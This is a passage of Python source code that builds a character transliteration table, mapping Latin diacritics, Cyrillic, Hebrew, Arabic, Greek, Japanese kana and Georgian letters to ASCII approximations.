self.trans[char] = u\"e\"\n for char in u\"ềếễệể\":\n self.trans[char] = u\"ê\"\n for char in u\"ḞƑ\":\n self.trans[char] = 
u\"F\"\n for char in u\"ḟƒ\":\n self.trans[char] = u\"f\"\n for char in u\"ǴḠĞĠĢǦǤƓ\":\n self.trans[char] = u\"G\"\n for char in u\"ǵḡğġģǧǥɠ\":\n self.trans[char] = u\"g\"\n self.trans[u\"Ĝ\"] = u\"Gx\"\n self.trans[u\"ĝ\"] = u\"gx\"\n for char in u\"ḢḤḦȞḨḪH̱ĦǶ\":\n self.trans[char] = u\"H\"\n for char in u\"ḣḥḧȟḩḫ̱ẖħƕ\":\n self.trans[char] = u\"h\"\n for char in u\"IÌȈÍÎĨḬÏḮĪĬȊĮǏİỊỈƗ\":\n self.trans[char] = u\"I\"\n for char in u\"ıìȉíîĩḭïḯīĭȋįǐiịỉɨ\":\n self.trans[char] = u\"i\"\n for char in u\"ĴJ\":\n self.trans[char] = u\"J\"\n for char in u\"ɟĵ̌ǰ\":\n self.trans[char] = u\"j\"\n for char in u\"ḰǨĶḲḴƘ\":\n self.trans[char] = u\"K\"\n for char in u\"ḱǩķḳḵƙ\":\n self.trans[char] = u\"k\"\n for char in u\"ĹĻĽḶḸḺḼȽŁ\":\n self.trans[char] = u\"L\"\n for char in u\"ĺļľḷḹḻḽƚłɫ\":\n self.trans[char] = u\"l\"\n for char in u\"ḾṀṂ\":\n self.trans[char] = u\"M\"\n for char in u\"ḿṁṃɱ\":\n self.trans[char] = u\"m\"\n for char in u\"ǸŃÑŅŇṄṆṈṊŊƝɲȠ\":\n self.trans[char] = u\"N\"\n for char in u\"ǹńñņňṅṇṉṋŋɲƞ\":\n self.trans[char] = u\"n\"\n for char in u\"ÒÓÔÕṌṎȬÖŌṐṒŎǑȮȰỌǪǬƠỜỚỠỢỞỎƟØǾ\":\n self.trans[char] = u\"O\"\n for char in u\"òóôõṍṏȭöōṑṓŏǒȯȱọǫǭơờớỡợởỏɵøǿ\":\n self.trans[char] = u\"o\"\n for char in u\"ȌŐȪ\":\n self.trans[char] = u\"Ö\"\n for char in u\"ȍőȫ\":\n self.trans[char] = u\"ö\"\n for char in u\"ỒỐỖỘỔȎ\":\n self.trans[char] = u\"Ô\"\n for char in u\"ồốỗộổȏ\":\n self.trans[char] = u\"ô\"\n for char in u\"ṔṖƤ\":\n self.trans[char] = u\"P\"\n for char in u\"ṕṗƥ\":\n self.trans[char] = u\"p\"\n self.trans[u\"ᵽ\"] = u\"q\"\n for char in u\"ȐŔŖŘȒṘṚṜṞ\":\n self.trans[char] = u\"R\"\n for char in u\"ȑŕŗřȓṙṛṝṟɽ\":\n self.trans[char] = u\"r\"\n for char in u\"ŚṤŞȘŠṦṠṢṨ\":\n self.trans[char] = u\"S\"\n for char in u\"śṥşșšṧṡṣṩȿ\":\n self.trans[char] = u\"s\"\n self.trans[u\"Ŝ\"] = u\"Sx\"\n self.trans[u\"ŝ\"] = u\"sx\"\n for char in u\"ŢȚŤṪṬṮṰŦƬƮ\":\n self.trans[char] = u\"T\"\n for char in u\"ţțťṫṭṯṱŧȾƭʈ\":\n self.trans[char] = u\"t\"\n for char in u\"ÙÚŨṸṴÜṲŪṺŬỤŮŲǓṶỦƯỮỰỬ\":\n self.trans[char] = u\"U\"\n for char in u\"ùúũṹṵüṳūṻŭụůųǔṷủưữựửʉ\":\n self.trans[char] = u\"u\"\n for char in u\"ȔŰǛǗǕǙ\":\n self.trans[char] = u\"Ü\"\n for char in u\"ȕűǜǘǖǚ\":\n self.trans[char] = u\"ü\"\n self.trans[u\"Û\"] = u\"Ux\"\n self.trans[u\"û\"] = u\"ux\"\n self.trans[u\"Ȗ\"] = u\"Û\"\n self.trans[u\"ȗ\"] = u\"û\"\n self.trans[u\"Ừ\"] = u\"Ù\"\n self.trans[u\"ừ\"] = u\"ù\"\n self.trans[u\"Ứ\"] = u\"Ú\"\n self.trans[u\"ứ\"] = u\"ú\"\n for char in u\"ṼṾ\":\n self.trans[char] = u\"V\"\n for char in u\"ṽṿ\":\n self.trans[char] = u\"v\"\n for char in u\"ẀẂŴẄẆẈ\":\n self.trans[char] = u\"W\"\n for char in u\"ẁẃŵẅẇẉ\":\n self.trans[char] = u\"w\"\n for char in u\"ẊẌ\":\n self.trans[char] = u\"X\"\n for char in u\"ẋẍ\":\n self.trans[char] = u\"x\"\n for char in u\"ỲÝŶŸỸȲẎỴỶƳ\":\n self.trans[char] = u\"Y\"\n for char in u\"ỳýŷÿỹȳẏỵỷƴ\":\n self.trans[char] = u\"y\"\n for char in u\"ŹẐŻẒŽẔƵȤ\":\n self.trans[char] = u\"Z\"\n for char in u\"źẑżẓžẕƶȥ\":\n self.trans[char] = u\"z\"\n self.trans[u\"ɀ\"] = u\"zv\"\n\n # Latin: extended Latin alphabet\n self.trans[u\"ɑ\"] = u\"a\"\n for char in u\"ÆǼǢ\":\n self.trans[char] = u\"AE\"\n for char in u\"æǽǣ\":\n self.trans[char] = u\"ae\"\n self.trans[u\"Ð\"] = u\"Dh\"\n self.trans[u\"ð\"] = u\"dh\"\n for char in u\"ƎƏƐ\":\n self.trans[char] = u\"E\"\n for char in u\"ǝəɛ\":\n self.trans[char] = u\"e\"\n for char in u\"ƔƢ\":\n self.trans[char] = u\"G\"\n for char in u\"ᵷɣƣᵹ\":\n self.trans[char] = u\"g\"\n self.trans[u\"Ƅ\"] = u\"H\"\n self.trans[u\"ƅ\"] = u\"h\"\n self.trans[u\"Ƕ\"] 
= u\"Wh\"\n self.trans[u\"ƕ\"] = u\"wh\"\n self.trans[u\"Ɩ\"] = u\"I\"\n self.trans[u\"ɩ\"] = u\"i\"\n self.trans[u\"Ŋ\"] = u\"Ng\"\n self.trans[u\"ŋ\"] = u\"ng\"\n self.trans[u\"Œ\"] = u\"OE\"\n self.trans[u\"œ\"] = u\"oe\"\n self.trans[u\"Ɔ\"] = u\"O\"\n self.trans[u\"ɔ\"] = u\"o\"\n self.trans[u\"Ȣ\"] = u\"Ou\"\n self.trans[u\"ȣ\"] = u\"ou\"\n self.trans[u\"Ƽ\"] = u\"Q\"\n for char in u\"ĸƽ\":\n self.trans[char] = u\"q\"\n self.trans[u\"ȹ\"] = u\"qp\"\n self.trans[u\"\"] = u\"r\"\n self.trans[u\"ſ\"] = u\"s\"\n self.trans[u\"ß\"] = u\"ss\"\n self.trans[u\"Ʃ\"] = u\"Sh\"\n for char in u\"ʃᶋ\":\n self.trans[char] = u\"sh\"\n self.trans[u\"Ʉ\"] = u\"U\"\n self.trans[u\"ʉ\"] = u\"u\"\n self.trans[u\"Ʌ\"] = u\"V\"\n self.trans[u\"ʌ\"] = u\"v\"\n for char in u\"ƜǷ\":\n self.trans[char] = u\"W\"\n for char in u\"ɯƿ\":\n self.trans[char] = u\"w\"\n self.trans[u\"Ȝ\"] = u\"Y\"\n self.trans[u\"ȝ\"] = u\"y\"\n self.trans[u\"IJ\"] = u\"IJ\"\n self.trans[u\"ij\"] = u\"ij\"\n self.trans[u\"Ƨ\"] = u\"Z\"\n for char in u\"ʮƨ\":\n self.trans[char] = u\"z\"\n self.trans[u\"Ʒ\"] = u\"Zh\"\n self.trans[u\"ʒ\"] = u\"zh\"\n self.trans[u\"Ǯ\"] = u\"Dzh\"\n self.trans[u\"ǯ\"] = u\"dzh\"\n for char in u\"ƸƹʔˀɁɂ\":\n self.trans[char] = u\"'\"\n self.trans['Þ'] = 'Th'\n self.trans['þ'] = 'th'\n for char in u\"Cʗǃ\":\n self.trans[char] = u\"!\"\n\n # Punctuation and typography\n for char in u\"«»“”„¨\":\n self.trans[char] = u'\"'\n for char in u\"‘’′\":\n self.trans[char] = u\"'\"\n self.trans[u\"•\"] = u\"*\"\n self.trans[u\"@\"] = u\"(at)\"\n self.trans[u\"¤\"] = u\"$\"\n self.trans[u\"¢\"] = u\"c\"\n self.trans[u\"€\"] = u\"E\"\n self.trans[u\"£\"] = u\"L\"\n self.trans[u\"¥\"] = u\"yen\"\n self.trans[u\"†\"] = u\"+\"\n self.trans[u\"‡\"] = u\"++\"\n self.trans[u\"°\"] = u\":\"\n self.trans[u\"¡\"] = u\"!\"\n self.trans[u\"¿\"] = u\"?\"\n self.trans[u\"‰\"] = u\"o/oo\"\n self.trans[u\"‱\"] = u\"o/ooo\"\n for char in u\"¶§\":\n self.trans[char] = u\">\"\n self.trans['…'] = '...'\n for char in u\"‒–—―\":\n self.trans[char] = u\"-\"\n self.trans['·'] = ' '\n self.trans[u\"¦\"] = u\"|\"\n self.trans[u\"⁂\"] = u\"***\"\n self.trans[u\"◊\"] = u\"<>\"\n self.trans[u\"‽\"] = u\"?!\"\n self.trans[u\"؟\"] = u\";-)\"\n self.trans[u\"¹\"] = u\"1\"\n self.trans[u\"²\"] = u\"2\"\n self.trans[u\"³\"] = u\"3\"\n\n # Cyrillic\n self.trans.update({u\"А\": u\"A\", u\"а\": u\"a\", u\"Б\": u\"B\", u\"б\": u\"b\",\n u\"В\": u\"V\", u\"в\": u\"v\", u\"Г\": u\"G\", u\"г\": u\"g\",\n u\"Д\": u\"D\", u\"д\": u\"d\", u\"Е\": u\"E\", u\"е\": u\"e\",\n u\"Ж\": u\"Zh\", u\"ж\": u\"zh\", u\"З\": u\"Z\", u\"з\": u\"z\",\n u\"И\": u\"I\", u\"и\": u\"i\", u\"Й\": u\"J\", u\"й\": u\"j\",\n u\"К\": u\"K\", u\"к\": u\"k\", u\"Л\": u\"L\", u\"л\": u\"l\",\n u\"М\": u\"M\", u\"м\": u\"m\", u\"Н\": u\"N\", u\"н\": u\"n\",\n u\"О\": u\"O\", u\"о\": u\"o\", u\"П\": u\"P\", u\"п\": u\"p\",\n u\"Р\": u\"R\", u\"р\": u\"r\", u\"С\": u\"S\", u\"с\": u\"s\",\n u\"Т\": u\"T\", u\"т\": u\"t\", u\"У\": u\"U\", u\"у\": u\"u\",\n u\"Ф\": u\"F\", u\"ф\": u\"f\", u\"х\": u\"kh\", u\"Ц\": u\"C\",\n u\"ц\": u\"c\", u\"Ч\": u\"Ch\", u\"ч\": u\"ch\", u\"Ш\": u\"Sh\",\n u\"ш\": u\"sh\", u\"Щ\": u\"Shch\", u\"щ\": u\"shch\", u\"Ь\": u\"'\",\n u\"ь\": \"'\", u\"Ъ\": u'\"', u\"ъ\": '\"', u\"Ю\": u\"Yu\",\n u\"ю\": u\"yu\", u\"Я\": u\"Ya\", u\"я\": u\"ya\", u\"Х\": u\"Kh\",\n u\"Χ\": u\"Kh\"})\n\n # Additional Cyrillic letters, most occuring in only one or a few languages\n self.trans.update({u\"Ы\": u\"Y\", u\"ы\": u\"y\", u\"Ё\": u\"Ë\", u\"ё\": u\"ë\",\n u\"Э\": 
u\"È\", u\"Ѐ\": u\"È\", u\"э\": u\"è\", u\"ѐ\": u\"è\",\n u\"І\": u\"I\", u\"і\": u\"i\", u\"Ї\": u\"Ji\", u\"ї\": u\"ji\",\n u\"Є\": u\"Je\", u\"є\": u\"je\", u\"Ґ\": u\"G\", u\"Ҝ\": u\"G\",\n u\"ґ\": u\"g\", u\"ҝ\": u\"g\", u\"Ђ\": u\"Dj\", u\"ђ\": u\"dj\",\n \"Љ\": \"Lj\", \"љ\": \"lj\",\n u\"Њ\": u\"Nj\", u\"њ\": u\"nj\", u\"Ћ\": u\"Cj\", u\"ћ\": u\"cj\",\n 'Җ': 'Zhj', 'Ѓ': 'Gj', 'ѓ': 'gj',\n u\"Ќ\": u\"Kj\", u\"ќ\": u\"kj\", u\"Ӣ\": u\"Ii\", u\"ӣ\": u\"ii\",\n \"Ҳ\": \"H\", \"ҳ\": \"h\",\n u\"Ҷ\": u\"Dz\", u\"ҷ\": u\"dz\", u\"Ө\": u\"Ô\", u\"Ӫ\": u\"Ô\",\n u\"ө\": u\"ô\", u\"ӫ\": u\"ô\", u\"Ү\": u\"Y\", u\"ү\": u\"y\", u\"Һ\": u\"H\",\n u\"һ\": u\"h\", u\"Ә\": u\"AE\", u\"Ӕ\": u\"AE\", u\"ә\": u\"ae\",\n 'Ӛ': 'Ë', 'Ӭ': 'Ë', 'ӛ': 'ë', 'ӭ': 'ë',\n 'җ': 'zhj', 'Ұ': 'U', 'ў': 'ù', 'Ў': 'Ù',\n u\"ѝ\": u\"ì\", u\"Ѝ\": u\"Ì\", u\"Ӑ\": u\"A\", u\"ă\": u\"a\", u\"Ӓ\": u\"Ä\",\n \"Ҽ\": \"Ts\", \"Ҿ\": \"Ts\", \"ҽ\": \"ts\", \"ҿ\": \"ts\",\n u\"Ҙ\": u\"Dh\", u\"ҙ\": u\"dh\", u\"Ӏ\": u\"\", u\"ӏ\": u\"\", u\"Ӆ\": u\"L\",\n u\"ӆ\": u\"l\", u\"Ӎ\": u\"M\", u\"ӎ\": u\"m\", u\"Ӧ\": u\"Ö\", u\"ӧ\": u\"ö\",\n u\"Ҩ\": u\"u\", u\"ҩ\": u\"u\", u\"Ҧ\": u\"Ph\", u\"ҧ\": u\"ph\", u\"Ҏ\": u\"R\",\n u\"ҏ\": u\"r\", u\"Ҫ\": u\"Th\", u\"ҫ\": u\"th\", u\"Ҭ\": u\"T\", u\"ҭ\": u\"t\",\n 'Ӯ': 'Û', 'ӯ': 'û', 'Ӹ': 'U', 'ұ': 'u',\n u\"ӹ\": u\"u\", u\"Ҵ\": u\"Tts\", u\"ҵ\": u\"tts\", u\"Ӵ\": u\"Ch\", u\"ӵ\": u\"ch\"})\n\n for char in u\"ЈӤҊ\":\n self.trans[char] = u\"J\"\n for char in u\"јӥҋ\":\n self.trans[char] = u\"j\"\n for char in u\"ЏӁӜҶ\":\n self.trans[char] = u\"Dzh\"\n for char in u\"џӂӝҷ\":\n self.trans[char] = u\"dzh\"\n for char in u\"ЅӞӠӋҸ\":\n self.trans[char] = u\"Dz\"\n for char in u\"ѕӟӡӌҹ\":\n self.trans[char] = u\"dz\"\n for char in u\"ҒӶҔ\":\n self.trans[char] = u\"G\"\n for char in u\"ғӷҕ\":\n self.trans[char] = u\"g\"\n for char in u\"ҚҞҠӃ\":\n self.trans[char] = u\"Q\"\n for char in u\"қҟҡӄ\":\n self.trans[char] = u\"q\"\n for char in u\"ҢҤӉӇ\":\n self.trans[char] = u\"Ng\"\n for char in u\"ңҥӊӈ\":\n self.trans[char] = u\"ng\"\n for char in u\"ӖѢҌ\":\n self.trans[char] = u\"E\"\n for char in u\"ӗѣҍ\":\n self.trans[char] = u\"e\"\n for char in u\"ӲӰҮ\":\n self.trans[char] = u\"Ü\"\n for char in u\"ӳӱү\":\n self.trans[char] = u\"ü\"\n\n # Archaic Cyrillic letters\n self.trans.update({u\"Ѹ\": u\"Ou\", u\"ѹ\": u\"ou\", u\"Ѡ\": u\"O\", u\"Ѻ\": u\"O\", u\"ѡ\": u\"o\",\n u\"ѻ\": u\"o\", u\"Ѿ\": u\"Ot\", u\"ѿ\": u\"ot\", u\"Ѣ\": u\"E\", u\"ѣ\": u\"e\",\n u\"Ѥ\": u\"Ei\", u\"Ѧ\": u\"Ei\", u\"ѥ\": u\"ei\", u\"ѧ\": u\"ei\", u\"Ѫ\": u\"Ai\",\n u\"ѫ\": u\"ai\", u\"Ѯ\": u\"X\", u\"ѯ\": u\"x\", u\"Ѱ\": u\"Ps\", u\"ѱ\": u\"ps\",\n u\"Ѳ\": u\"Th\", u\"ѳ\": u\"th\", u\"Ѵ\": u\"Ü\", u\"Ѷ\": u\"Ü\", u\"ѵ\": u\"ü\"})\n\n # Hebrew alphabet\n for char in u\"אע\":\n self.trans[char] = u\"'\"\n self.trans[u\"ב\"] = u\"b\"\n self.trans[u\"ג\"] = u\"g\"\n self.trans[u\"ד\"] = u\"d\"\n self.trans[u\"ה\"] = u\"h\"\n self.trans[u\"ו\"] = u\"v\"\n self.trans[u\"ז\"] = u\"z\"\n self.trans[u\"ח\"] = u\"kh\"\n self.trans[u\"ט\"] = u\"t\"\n self.trans[u\"י\"] = u\"y\"\n for char in u\"ךכ\":\n self.trans[char] = u\"k\"\n self.trans[u\"ל\"] = u\"l\"\n for char in u\"םמ\":\n self.trans[char] = u\"m\"\n for char in u\"ןנ\":\n self.trans[char] = u\"n\"\n self.trans[u\"ס\"] = u\"s\"\n for char in u\"ףפ\":\n self.trans[char] = u\"ph\"\n for char in u\"ץצ\":\n self.trans[char] = u\"ts\"\n self.trans[u\"ק\"] = u\"q\"\n self.trans[u\"ר\"] = u\"r\"\n self.trans[u\"ש\"] = u\"sh\"\n self.trans[u\"ת\"] = u\"th\"\n\n # Arab alphabet\n for char in 
u\"اﺍﺎ\":\n self.trans[char] = u\"a\"\n for char in u\"بﺏﺐﺒﺑ\":\n self.trans[char] = u\"b\"\n for char in u\"تﺕﺖﺘﺗ\":\n self.trans[char] = u\"t\"\n for char in u\"ثﺙﺚﺜﺛ\":\n self.trans[char] = u\"th\"\n for char in u\"جﺝﺞﺠﺟ\":\n self.trans[char] = u\"g\"\n for char in u\"حﺡﺢﺤﺣ\":\n self.trans[char] = u\"h\"\n for char in u\"خﺥﺦﺨﺧ\":\n self.trans[char] = u\"kh\"\n for char in u\"دﺩﺪ\":\n self.trans[char] = u\"d\"\n for char in u\"ذﺫﺬ\":\n self.trans[char] = u\"dh\"\n for char in u\"رﺭﺮ\":\n self.trans[char] = u\"r\"\n for char in u\"زﺯﺰ\":\n self.trans[char] = u\"z\"\n for char in u\"سﺱﺲﺴﺳ\":\n self.trans[char] = u\"s\"\n for char in u\"شﺵﺶﺸﺷ\":\n self.trans[char] = u\"sh\"\n for char in u\"صﺹﺺﺼﺻ\":\n self.trans[char] = u\"s\"\n for char in u\"ضﺽﺾﻀﺿ\":\n self.trans[char] = u\"d\"\n for char in u\"طﻁﻂﻄﻃ\":\n self.trans[char] = u\"t\"\n for char in u\"ظﻅﻆﻈﻇ\":\n self.trans[char] = u\"z\"\n for char in u\"عﻉﻊﻌﻋ\":\n self.trans[char] = u\"'\"\n for char in u\"غﻍﻎﻐﻏ\":\n self.trans[char] = u\"gh\"\n for char in u\"فﻑﻒﻔﻓ\":\n self.trans[char] = u\"f\"\n for char in u\"قﻕﻖﻘﻗ\":\n self.trans[char] = u\"q\"\n for char in u\"كﻙﻚﻜﻛک\":\n self.trans[char] = u\"k\"\n for char in u\"لﻝﻞﻠﻟ\":\n self.trans[char] = u\"l\"\n for char in u\"مﻡﻢﻤﻣ\":\n self.trans[char] = u\"m\"\n for char in u\"نﻥﻦﻨﻧ\":\n self.trans[char] = u\"n\"\n for char in u\"هﻩﻪﻬﻫ\":\n self.trans[char] = u\"h\"\n for char in u\"وﻭﻮ\":\n self.trans[char] = u\"w\"\n for char in u\"یيﻱﻲﻴﻳ\":\n self.trans[char] = u\"y\"\n # Arabic - additional letters, modified letters and ligatures\n self.trans[u\"ﺀ\"] = u\"'\"\n for char in u\"آﺁﺂ\":\n self.trans[char] = u\"'a\"\n for char in u\"ةﺓﺔ\":\n self.trans[char] = u\"th\"\n for char in u\"ىﻯﻰ\":\n self.trans[char] = u\"á\"\n for char in u\"یﯼﯽﯿﯾ\":\n self.trans[char] = u\"y\"\n self.trans[u\"؟\"] = u\"?\"\n # Arabic - ligatures\n for char in u\"ﻻﻼ\":\n self.trans[char] = u\"la\"\n self.trans[u\"ﷲ\"] = u\"llah\"\n for char in u\"إأ\":\n self.trans[char] = u\"a'\"\n self.trans[u\"ؤ\"] = u\"w'\"\n self.trans[u\"ئ\"] = u\"y'\"\n for char in u\"◌◌\":\n self.trans[char] = u\"\" # indicates absence of vowels\n # Arabic vowels\n self.trans[u\"◌\"] = u\"a\"\n self.trans[u\"◌\"] = u\"u\"\n self.trans[u\"◌\"] = u\"i\"\n self.trans[u\"◌\"] = u\"a\"\n self.trans[u\"◌\"] = u\"ay\"\n self.trans[u\"◌\"] = u\"ay\"\n self.trans[u\"◌\"] = u\"u\"\n self.trans[u\"◌\"] = u\"iy\"\n # Arab numerals\n for char in u\"٠۰\":\n self.trans[char] = u\"0\"\n for char in u\"١۱\":\n self.trans[char] = u\"1\"\n for char in u\"٢۲\":\n self.trans[char] = u\"2\"\n for char in u\"٣۳\":\n self.trans[char] = u\"3\"\n for char in u\"٤۴\":\n self.trans[char] = u\"4\"\n for char in u\"٥۵\":\n self.trans[char] = u\"5\"\n for char in u\"٦۶\":\n self.trans[char] = u\"6\"\n for char in u\"٧۷\":\n self.trans[char] = u\"7\"\n for char in u\"٨۸\":\n self.trans[char] = u\"8\"\n for char in u\"٩۹\":\n self.trans[char] = u\"9\"\n # Perso-Arabic\n for char in u\"پﭙﭙپ\":\n self.trans[char] = u\"p\"\n for char in u\"چچچچ\":\n self.trans[char] = u\"ch\"\n for char in u\"ژژ\":\n self.trans[char] = u\"zh\"\n for char in u\"گﮔﮕﮓ\":\n self.trans[char] = u\"g\"\n\n # Greek\n self.trans.update({u\"Α\": u\"A\", u\"α\": u\"a\", u\"Β\": u\"B\", u\"β\": u\"b\", u\"Γ\": u\"G\",\n u\"γ\": u\"g\", u\"Δ\": u\"D\", u\"δ\": u\"d\", u\"Ε\": u\"E\", u\"ε\": u\"e\",\n u\"Ζ\": u\"Z\", u\"ζ\": u\"z\", u\"Η\": u\"I\", u\"η\": u\"i\", u\"θ\": u\"th\",\n u\"Θ\": u\"Th\", u\"Ι\": u\"I\", u\"ι\": u\"i\", u\"Κ\": u\"K\", u\"κ\": u\"k\",\n u\"Λ\": u\"L\", u\"λ\": u\"l\", u\"Μ\": 
u\"M\", u\"μ\": u\"m\", u\"Ν\": u\"N\",\n u\"ν\": u\"n\", u\"Ξ\": u\"X\", u\"ξ\": u\"x\", u\"Ο\": u\"O\", u\"ο\": u\"o\",\n u\"Π\": u\"P\", u\"π\": u\"p\", u\"Ρ\": u\"R\", u\"ρ\": u\"r\", u\"Σ\": u\"S\",\n u\"σ\": u\"s\", u\"ς\": u\"s\", u\"Τ\": u\"T\", u\"τ\": u\"t\", u\"Υ\": u\"Y\",\n u\"υ\": u\"y\", u\"Φ\": u\"F\", u\"φ\": u\"f\", u\"Ψ\": u\"Ps\", u\"ψ\": u\"ps\",\n u\"Ω\": u\"O\", u\"ω\": u\"o\", u\"ϗ\": u\"&\", u\"Ϛ\": u\"St\", u\"ϛ\": u\"st\",\n u\"Ϙ\": u\"Q\", u\"Ϟ\": u\"Q\", u\"ϙ\": u\"q\", u\"ϟ\": u\"q\", u\"Ϻ\": u\"S\",\n u\"ϻ\": u\"s\", u\"Ϡ\": u\"Ss\", u\"ϡ\": u\"ss\", u\"Ϸ\": u\"Sh\", u\"ϸ\": u\"sh\",\n u\"·\": u\":\", u\"Ά\": u\"Á\", u\"ά\": u\"á\", u\"Έ\": u\"É\", u\"Ή\": u\"É\",\n u\"έ\": u\"é\", u\"ή\": u\"é\", u\"Ί\": u\"Í\", u\"ί\": u\"í\", u\"Ϊ\": u\"Ï\",\n u\"ϊ\": u\"ï\", u\"ΐ\": u\"ï\", u\"Ό\": u\"Ó\", u\"ό\": u\"ó\", u\"Ύ\": u\"Ý\",\n u\"ύ\": u\"ý\", u\"Ϋ\": u\"Y\", u\"ϋ\": u\"ÿ\", u\"ΰ\": u\"ÿ\", u\"Ώ\": u\"Ó\",\n u\"ώ\": u\"ó\"})\n\n # Japanese (katakana and hiragana)\n for char in u\"アァあ\":\n self.trans[char] = u\"a\"\n for char in u\"イィい\":\n self.trans[char] = u\"i\"\n for char in u\"ウう\":\n self.trans[char] = u\"u\"\n for char in u\"エェえ\":\n self.trans[char] = u\"e\"\n for char in u\"オォお\":\n self.trans[char] = u\"o\"\n for char in u\"ャや\":\n self.trans[char] = u\"ya\"\n for char in u\"ュゆ\":\n self.trans[char] = u\"yu\"\n for char in u\"ョよ\":\n self.trans[char] = u\"yo\"\n for char in u\"カか\":\n self.trans[char] = u\"ka\"\n for char in u\"キき\":\n self.trans[char] = u\"ki\"\n for char in u\"クく\":\n self.trans[char] = u\"ku\"\n for char in u\"ケけ\":\n self.trans[char] = u\"ke\"\n for char in u\"コこ\":\n self.trans[char] = u\"ko\"\n for char in u\"サさ\":\n self.trans[char] = u\"sa\"\n for char in u\"シし\":\n self.trans[char] = u\"shi\"\n for char in u\"スす\":\n self.trans[char] = u\"su\"\n for char in u\"セせ\":\n self.trans[char] = u\"se\"\n for char in u\"ソそ\":\n self.trans[char] = u\"so\"\n for char in u\"タた\":\n self.trans[char] = u\"ta\"\n for char in u\"チち\":\n self.trans[char] = u\"chi\"\n for char in u\"ツつ\":\n self.trans[char] = u\"tsu\"\n for char in u\"テて\":\n self.trans[char] = u\"te\"\n for char in u\"トと\":\n self.trans[char] = u\"to\"\n for char in u\"ナな\":\n self.trans[char] = u\"na\"\n for char in u\"ニに\":\n self.trans[char] = u\"ni\"\n for char in u\"ヌぬ\":\n self.trans[char] = u\"nu\"\n for char in u\"ネね\":\n self.trans[char] = u\"ne\"\n for char in u\"ノの\":\n self.trans[char] = u\"no\"\n for char in u\"ハは\":\n self.trans[char] = u\"ha\"\n for char in u\"ヒひ\":\n self.trans[char] = u\"hi\"\n for char in u\"フふ\":\n self.trans[char] = u\"fu\"\n for char in u\"ヘへ\":\n self.trans[char] = u\"he\"\n for char in u\"ホほ\":\n self.trans[char] = u\"ho\"\n for char in u\"マま\":\n self.trans[char] = u\"ma\"\n for char in u\"ミみ\":\n self.trans[char] = u\"mi\"\n for char in u\"ムむ\":\n self.trans[char] = u\"mu\"\n for char in u\"メめ\":\n self.trans[char] = u\"me\"\n for char in u\"モも\":\n self.trans[char] = u\"mo\"\n for char in u\"ラら\":\n self.trans[char] = u\"ra\"\n for char in u\"リり\":\n self.trans[char] = u\"ri\"\n for char in u\"ルる\":\n self.trans[char] = u\"ru\"\n for char in u\"レれ\":\n self.trans[char] = u\"re\"\n for char in u\"ロろ\":\n self.trans[char] = u\"ro\"\n for char in u\"ワわ\":\n self.trans[char] = u\"wa\"\n for char in u\"ヰゐ\":\n self.trans[char] = u\"wi\"\n for char in u\"ヱゑ\":\n self.trans[char] = u\"we\"\n for char in u\"ヲを\":\n self.trans[char] = u\"wo\"\n for char in u\"ンん\":\n self.trans[char] = u\"n\"\n for char in u\"ガが\":\n self.trans[char] = 
u\"ga\"\n for char in u\"ギぎ\":\n self.trans[char] = u\"gi\"\n for char in u\"グぐ\":\n self.trans[char] = u\"gu\"\n for char in u\"ゲげ\":\n self.trans[char] = u\"ge\"\n for char in u\"ゴご\":\n self.trans[char] = u\"go\"\n for char in u\"ザざ\":\n self.trans[char] = u\"za\"\n for char in u\"ジじ\":\n self.trans[char] = u\"ji\"\n for char in u\"ズず\":\n self.trans[char] = u\"zu\"\n for char in u\"ゼぜ\":\n self.trans[char] = u\"ze\"\n for char in u\"ゾぞ\":\n self.trans[char] = u\"zo\"\n for char in u\"ダだ\":\n self.trans[char] = u\"da\"\n for char in u\"ヂぢ\":\n self.trans[char] = u\"dji\"\n for char in u\"ヅづ\":\n self.trans[char] = u\"dzu\"\n for char in u\"デで\":\n self.trans[char] = u\"de\"\n for char in u\"ドど\":\n self.trans[char] = u\"do\"\n for char in u\"バば\":\n self.trans[char] = u\"ba\"\n for char in u\"ビび\":\n self.trans[char] = u\"bi\"\n for char in u\"ブぶ\":\n self.trans[char] = u\"bu\"\n for char in u\"ベべ\":\n self.trans[char] = u\"be\"\n for char in u\"ボぼ\":\n self.trans[char] = u\"bo\"\n for char in u\"パぱ\":\n self.trans[char] = u\"pa\"\n for char in u\"ピぴ\":\n self.trans[char] = u\"pi\"\n for char in u\"プぷ\":\n self.trans[char] = u\"pu\"\n for char in u\"ペぺ\":\n self.trans[char] = u\"pe\"\n for char in u\"ポぽ\":\n self.trans[char] = u\"po\"\n for char in u\"ヴゔ\":\n self.trans[char] = u\"vu\"\n self.trans[u\"ヷ\"] = u\"va\"\n self.trans[u\"ヸ\"] = u\"vi\"\n self.trans[u\"ヹ\"] = u\"ve\"\n self.trans[u\"ヺ\"] = u\"vo\"\n\n # Japanese and Chinese punctuation and typography\n for char in u\"・·\":\n self.trans[char] = u\" \"\n for char in u\"〃『』《》\":\n self.trans[char] = u'\"'\n for char in u\"「」〈〉〘〙〚〛\":\n self.trans[char] = u\"'\"\n for char in u\"(〔\":\n self.trans[char] = u\"(\"\n for char in u\")〕\":\n self.trans[char] = u\")\"\n for char in u\"[【〖\":\n self.trans[char] = u\"[\"\n for char in u\"]】〗\":\n self.trans[char] = u\"]\"\n self.trans['{'] = '{'\n self.trans['}'] = '}'\n self.trans['っ'] = ':'\n self.trans['ー'] = 'h'\n self.trans['゛'] = \"'\"\n self.trans['゜'] = 'p'\n self.trans['。'] = '. 
'\n self.trans['、'] = ', '\n self.trans['・'] = ' '\n self.trans['〆'] = 'shime'\n self.trans['〜'] = '-'\n self.trans['…'] = '...'\n self.trans['‥'] = '..'\n self.trans['ヶ'] = 'months'\n for char in u\"•◦\":\n self.trans[char] = u\"_\"\n for char in u\"※*\":\n self.trans[char] = u\"*\"\n self.trans['Ⓧ'] = '(X)'\n self.trans['Ⓨ'] = '(Y)'\n self.trans['!'] = '!'\n self.trans['?'] = '?'\n self.trans[';'] = ';'\n self.trans[':'] = ':'\n self.trans['。'] = '.'\n for char in u\",、\":\n self.trans[char] = u\",\"\n\n # Georgian\n self.trans['ა'] = 'a'\n self.trans['ბ'] = 'b'\n self.trans['გ'] = 'g'\n self.trans['დ'] = 'd'\n for char in u\"ეჱ\":\n self.trans[char] = u\"e\"\n self.trans['ვ'] = 'v'\n self.trans['ზ'] = 'z'\n self.trans['თ'] = 'th'\n self.trans['ი'] = 'i'\n self.trans['კ'] = 'k'\n self.trans['ლ'] = 'l'\n self.trans['მ'] = 'm'\n self.trans['ნ'] = 'n'\n self.trans['ო'] = 'o'\n self.trans['პ'] = 'p'\n self.trans['ჟ'] = 'zh'\n 